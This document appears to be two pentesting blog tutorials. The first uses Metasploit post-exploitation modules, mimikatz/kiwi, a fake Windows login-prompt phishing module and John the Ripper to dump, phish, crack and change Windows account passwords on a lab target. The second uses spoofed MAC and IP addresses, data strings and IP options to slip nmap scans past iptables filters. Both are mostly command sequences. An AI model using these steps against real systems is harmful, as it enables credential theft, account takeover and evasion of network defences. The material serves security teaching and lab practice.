Post Exploitation for Remote Windows Password

In this article you will leran how to extract Windows users password and change extracted password using metasploit framework. 

Here you need to exploit target machine once to obtain meterpreter session and then bypass UAC for admin privilege.

Requirement:

Attacker: kali Linux

Target: windows 7

Let’s Begin

Extracting User Account Password

1st method

So when your get meterpreter session of target system then follows given below steps:  

Execute given below command which will dump Hash value of all saved password of all windows users as shown in given below image.

meterpreter> hashdump

Now copy all hash value in a text file as shown below and save it. I had saved it as hash.txt on the desktop. It contains hash value of 4 users with SID value as 500: Administrator; 501: Guest; 1001: Penetst; 1000: Raj with their hash password.

Run your capture session in background:

meterpreter > background

Now a new terminal and use john the ripper to crack the hash by executing given below command:

john –wordlist=/root/Desktop/pass.txt –format=NT /root/Desktop/hashes.txt

/root/Desktop/pass.txt contain path of your password dictionary

/root/Desktop/hashes.txt contain path of hash password value

From given below image you can confirm we had successfully retrieved the password: 123 for user: raj by cracking its hash value.

2nd Method

This module will dump the local user accounts from the SAM database using the registry.

msf > use post/windows/gather/hashdump

msf post(hashdump) > set session 2

msf post(hashdump) > exploit

From given below image you can observe again we obtained hash value for local user account, repeat above step to crack these value using john the ripper.

If you will notice the highlighted text then you will observe that it has capture password hint for user RAJ: “first three digits”

3rd Method

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

msf > use post/windows/gather/smart_hashdump

msf post(smart_hashdump) > set session 2

msf post(smart_hashdump) > exploit

From given below image you can observe again we obtained hash value for RAJ and Administrator account, repeat above step to crack these value using john the ripper. Moreover it has capture same password hint for User Raj.

4th Method

This module harvests credentials found on the host and stores them in the database.

msf > use post/windows/gather/credentials/credential_collector

msf post(credential_collector) > set sessions 2

msf post(credential_collector) > exploit

This exploit also work in same manner and dump the hash value for local user account as shown in given below image, repeat above step to crack these value using john the ripper.

5th Method

This module will collect clear text Single Sign On credentials from the Local Security Authority using the Mimikatz extension. Blank passwords will not be stored in the database.

msf > use post/windows/gather/credentials/sso   

msf post(sso) > set sessions 2

msf post(sso) > exploit

This exploit will dump clear text password of login user as shown in given below image user: raj and password: 123

 

6th Method

At meterpereter session we can enable option “kiwi” which work similarly as “mimikatz” in windows, execute given below command: 

meterprerter > load kiwi

Now run following command which will extract all saved credential of local user account as shown in given below image, here also we had successfully  retrieve  password: 123 of user: raj

meterpreter > cred all

7th Method

This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills credentials in the login prompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a login prompt when a specific process is starting.

msf > use post/windows/gather/phish_windows_credentials

msf post(phish_windows_credentials) > set session 2

msf post(phish_windows_credentials) > exploit

As define above it will launch fake login prompt which will appear genuine to victim on his logon screen and wait for user to his credential.

At logon screen user will get a fake pop for his credential as his will enter his username and password for login into his system, attacker at background will sniff the entered credential.

From given below image you can observe the sniff credential for user raj. It saved username, domain and password in a table.

Change password of Remote system

1st Method

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.

msf > use post/windows/manage/change_password

msf post(change_password) > set smbuser raj

msf post(change_password) > set old_password 123

msf post(change_password) > set new_password 987

msf post(change_password) > set session 1

msf post(change_password) > exploit 

Since after knowing logging user “raj” password you can easily change his password by exploiting above command. From given below image you can observe we had change password 123 into 987.

2nd Method

As we known meterepreter itself is a set of various options for post exploits it allows attacker to open command prompt of victims system without his permission by executing shell command as given below.

meterepreter> shell

net user

net user raj 123

Hence in 1st method we had change password into 987 from 123 and now again in 2nd method we had change password from 987 to 123 using simple CMD net user command as shown in given below command.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Understanding Guide to Nmap Firewall Scan (Part 2)

In our previous article we had demonstrated “Nmap firewall scan (part 1)” by making use of Iptable rules and then try to bypass firewall filter to perform NMAP Advance scanning, today we are going to discuss second part of it.  

Requirement

Attacker: Kali Linux

Target: Ubuntu  

Spoof MAC Address Scan

Allow TCP Packet from Specific Mac Address

If network admin wants to establish TCP connect from specific MAC address and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network.  

iptables -I INPUT -p tcp -m mac –source-mac “AA:AA:AA:AA:AA:AA” -j ACCEPT

iptables -I INPUT -p tcp -j REJECT –reject-with tcp-reset

Now when attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system.

nmap 192.168.1.117

In order to bypass above applied filter attacker may run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all MAC address in nmap command or save all MAC address in a text file and give its path in nmap command but to perform this attacker first need to enable “Promiscuous mode” of his network. Well, to do so type given below commands first for Promiscuous mode and second for nmap scanning.

ip link set eth0 promisc on

nmap –spoof-mac AA:AA:AA:AA:AA:AA 192.168.1.117

Hence if you are lucky to spoof correct Mac address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Nice!!! If you will notice in given below image you will observe open ports of target’s network.

Allow TCP Packet from Specific IP

If network admin wants to establish TCP connect from specific IP and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp -s 192.168.1.120 -j ACCEPT

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system.

nmap 192.168.1.117

Spoof IP Address

In order to bypass above applied filter attacker may again run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all IP address in nmap command or save all IP address in a text file and give its path in nmap command and then execute following command:

nmap -e eth0 -S 192.168.1.120 192.168.1.117

Hence if you are lucky to spoof correct IP address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Great!! If you will notice in given below image you will observe open ports of target’s network.

Data-String Scan

Allow TCP Packet from Specific String

If network admin wants to establish TCP connect from a system which contain specific string and do not want to connect with other system does not contain that special string packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string –algo bm –string “Khulja sim sim” -j ACCEPT

iptables -A INPUT -p tcp -j REJECT –reject-with tcp-reset

In above rule you can see we had used “Khulja sim sim” as special string to establish TCP connection. Hence only those TCP connection could be establish which contain “Khulja sim sim”in packets.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

If attacker somehow sniffs special string “khulja sim sim” to connect with target’s network then he could use –data-string argument in nmap command to bypass the firewall.

nmap –data-string “Khulja sim sim” 192.168.1.117

Hence if you are lucky to sniff correct data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Wonderful!! If you will notice given below image you will observe open ports of target’s network.

Hex String Scan

Allow TCP Packet from Specific Hex String

If network admin wants to establish TCP connect from a system which contain hexadecimal value of particular string and do not want to connect with other system does not contain hexadecimal value of that special string in packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string –algo kmp –hex-string “RAJ” -j ACCEPT

iptables -A INPUT -p tcp -j REJECT –reject-with tcp-reset

In above rule you can see we had used hex value for “RAJ” as special string to establish TCP connection. Hence only those TCP connection could be established which contain hex value of “RAJ” in packet.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain hex value of special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

If attacker somehow sniffs special string “RAJ” to connect with target’s network then he could used its hex values with –data argument in nmap command to bypass the firewall.

nmap –data “\x52\x41\x4a” 192.168.1.117

Hence if you are lucky to sniff correct hex value of particular data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Hence, if you will notice given below image you will observe open ports of target’s network.

IP-Options Scan

Reject TCP Packets contains tcp-option

By default nmap sends 24 bytes of TCP data in which 4 bytes of data is reserve for TCP Options if network admin reject 4 bytes tcp –option packet to discord tcp connection to prevent his network from scanning. Type following iptable rule to reject 4 bit tcp-option in his network:

 iptables -A INPUT -p tcp –tcp-option 4  -j REJECT –reject-with tcp-reset

Now when attacker will perform TCP scanning [sT] on target’s network, he could not able to enumerate ports and running service of victim’s system. Since tcp-option is 4 bytes hence firewall discard tcp packet of attacker’s network.

nmap -sT 192.168.1.117

The IP protocol gives numerous options that could be placed in packet headers. Contrasting the omnipresent TCP options, IP options are seldom observed because of security reasons. The most powerful way to specify IP options is to simply pass in hexadecimal data as the argument to –ip-options.

Precede every hex byte value with \x. You may repeat certain characters by following them with an asterisk and then the number of times you wish them to repeat. For example, \x01\x07\x04\x00*4 is the same as\x01\x07\x04\x00\x00\x00\x00 this is also called NuLL bytes

Now type following command with ip-option argument as shown below:

nmap –ip-option “\x00\x00\x00\x00\x00*” 192.168.1.117

Note that if you denote a number of bytes that is not a multiple of four; an incorrect IP header length will be set in the IP packet. The reason for this is that the IP header length field can only express multiples of four. In those cases, the length is computed by dividing the header length by 4 and rounding down. 

GOOD! If you will notice given below image you will observe open ports of target’s network.

https://nmap.org/book/nping-man-ip-options.html

Related Posts Plugin for WordPress, Blogger...